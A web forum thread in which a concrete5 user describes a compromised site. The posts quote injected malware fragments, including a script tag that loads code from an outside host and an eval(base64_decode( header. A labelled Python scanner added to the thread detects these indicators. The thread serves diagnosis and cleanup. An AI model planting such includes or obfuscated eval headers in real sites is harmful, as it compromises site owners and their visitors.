edit buttons not appearing
I've been experimenting with c5 to see if I want to use it. I'm a total newbie.
When I click the link at the bottom of a page to edit it, recently no edit buttons appear at the top of the page. I'm wondering whether there's a security hole and someone has taken over my pages. Here's why. When I click that link, I get an error in the web console showing that page_controls_menu.js contains this line:
<script src="http://arlypr16oblemt.rr.nu/nl.php?p=d"></script>
Moreover, looking directly into page_control_menu.js, I find that that line never occurs, but that it starts with a huge eval:
<?php /**/ eval(base64_decode("aWY
etc. I base64-decoded the big long string and it looks really suspicious, containing lines like this:
$_SERVER['s_d1']="http://sweepstakesandcontestsdo.com/";
My guess is that eval injects troublesome code into the javascript file. Have I been exploited somehow? How can I lock this down? Even if I solve the permissions issue, how can I clean out my scripts of this stuff? Thanks.
Here's more info about that. I see that my files directory has 777 permissions and that inside it is a very suspicious-looking php file called changarliene.php consisting mostly of a big base64 string.
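A small scanner for the indicators reported in the posts above (an `eval(base64_decode(` header at the start of a file, a PHP open tag inside a `.js` file, a world-writable directory), given as an added example that is not part of the original thread. The directory layout, file names and the short base64 string in `demo()` are constructed sample data.

```python
import os
import re
import stat
import tempfile

# Indicators taken from the thread: an eval of a base64-decoded string at the top of a file.
INJECT = re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I)
PHP_OPEN = re.compile(rb"^\s*<\?php", re.I)
NON_PHP = {".js", ".css", ".html", ".htm"}  # assumption: types that should never start with PHP

def scan(root, head_bytes=4096):
    """Return sorted (relative_path, reason) findings under root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in dirnames:
            p = os.path.join(dirpath, d)
            if not os.path.islink(p) and os.lstat(p).st_mode & stat.S_IWOTH:
                findings.append((os.path.relpath(p, root), "world-writable directory"))
        for f in filenames:
            p = os.path.join(dirpath, f)
            if os.path.islink(p) or not os.path.isfile(p):
                continue
            with open(p, "rb") as fh:
                head = fh.read(head_bytes)  # the injected header sits at the start
            rel = os.path.relpath(p, root)
            if INJECT.search(head):
                findings.append((rel, "eval(base64_decode( near start of file"))
            if os.path.splitext(f)[1].lower() in NON_PHP and PHP_OPEN.match(head):
                findings.append((rel, "PHP open tag in non-PHP file"))
    return sorted(findings)

def demo():
    """Build a constructed site tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        for d in ("js", "files"):
            os.makedirs(os.path.join(root, d))
        os.chmod(os.path.join(root, "files"), 0o777)  # constructed: the 777 directory
        samples = {
            "js/menu.js": b'<?php /**/ eval(base64_decode("QUJD")); ?>\nvar a = 1;\n',
            "js/clean.js": b"var b = 2;\n",
            "files/dropped.php": b'<?php eval(base64_decode("QUJD"));\n',
            "index.php": b"<?php echo 'hello';\n",
        }
        for rel, data in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(data)
        return scan(root)
```

Flagged files are best restored from a known-good copy of the release rather than edited by hand, since the scan only inspects the first 4096 bytes of each file.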
I think there's another forum thread going about this: http://www.concrete5.org/community/forums/customizing_c5/if-your-dr...
Hope that helps you out.
Very interesting, thanks. In the end I just deleted the whole Concrete5 site. I can't decide what's flawed here: Dreamhost, Concrete5, or php. But the fact that such exploits can be performed on sites so readily and widely (as evidenced by lots of messages on this same sort of topic on these forums) means I won't be adopting Concrete5 any time soon. It was fun testing and playing with it, but such a flaw is fatal.
As I understand it, this is happening to php based sites at dreamhost. Other hosts are not having this issue, and at dreamhost it's not confined to concrete5, it's happened with various php based systems.
Good luck with your new direction.
I see no evidence that this is confined to dreamhost (or even to Concrete5, since I've seen exactly the same thing in a friend's Gallery site). Lots of posts don't mention dreamhost, and some mention other hosts.
http://www.concrete5.org/community/forums/usage/file-manager-lost-i...
http://www.concrete5.org/community/forums/customizing_c5/someone-ha...
http://www.concrete5.org/community/forums/chat/concrete5-web-site-h...
Lots of others.
Thanks for the additional info, mattski. It's annoying that anyone has to deal with this stuff.